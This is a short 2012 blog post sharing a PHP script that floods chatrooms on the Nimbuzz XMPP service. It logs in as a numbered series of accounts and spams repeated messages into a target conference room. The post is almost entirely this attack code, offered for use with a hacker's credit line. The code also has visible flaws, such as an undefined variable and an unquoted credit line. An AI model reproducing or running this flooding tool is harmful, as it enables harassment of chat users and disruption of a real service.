Wednesday, October 17, 2012

php script for flood:



Code:
        set_time_limit(5);
    $no=$_POST['a'];
    $no1=$_POST['y'];
    $user1=$_POST['smartboys-'];
    $user2=$_POST['-team'];
    $nick=$_POST['smartboys'];
    $res=$_POST['resource'];
    $host='openfire.nimbuzz.com';
    $port='5222';
    $server='nimbuzz.com';
    $password=$_POST['wtpgjm'];
    $target = $_POST['target'];
    $to ="$target@conference.nimbuzz.com";
    $jml =$_POST['jml'];
    $body1 = $_POST['flood2'];
    $value = $_POST['subjek'];
    require_once 'XMPPHP/Log.php';
    include 'XMPPHP/XMPP.php';

    for ($j=1; $j<=$jml; $j++)

    {

    for ($i=$no; $i<=$no1; $i++)
    {

    $pengguna= ($user1.$i.$user2);
    $resource = ($res.$i);$mondol=($nick.$i);
    $koneksi = new XMPPHP_XMPP($host, $port, $pengguna, $password, $resource, $server, $printlog=false, $loglevel=XMPPHP_Log::LEVEL_INFO);
    $koneksi->connect();
    sleep(1);
    $koneksi->processUntil('session_start');
    $koneksi->presence(NULL, "bot", $to."/".$pengguna, "available");
    $koneksi->message($to, $value,"groupchat", $subject=$value);
    $koneksi->message($to, $body1, "groupchat");
    $koneksi->message($to, $body1, "groupchat");
    $koneksi->message($to, $body1, "groupchat");
    $koneksi->message($to, $body1, "groupchat");
    $koneksi->message($to, $body1, "groupchat");
    $koneksi->message($to, $body2, "groupchat");
    $koneksi->message($to, $body2, "groupchat");
    $koneksi->message($to, $body2, "groupchat");
    $koneksi->message($to, $body2, "groupchat");
    $koneksi->message($to, $body2, "groupchat");
    $koneksi->presence(NULL, "bot", "$to/$mondol", "unavailable");
    sleep(3);
    echo ("Flood from $pengguna have been sent..Thanks for use-----web by -=empt!ness=-@nimbuzz.com");
    echo ("
");
    coded by -=r3no_sif_cyber=-
    }
    }
    ?>

0 komentar:

Post a Comment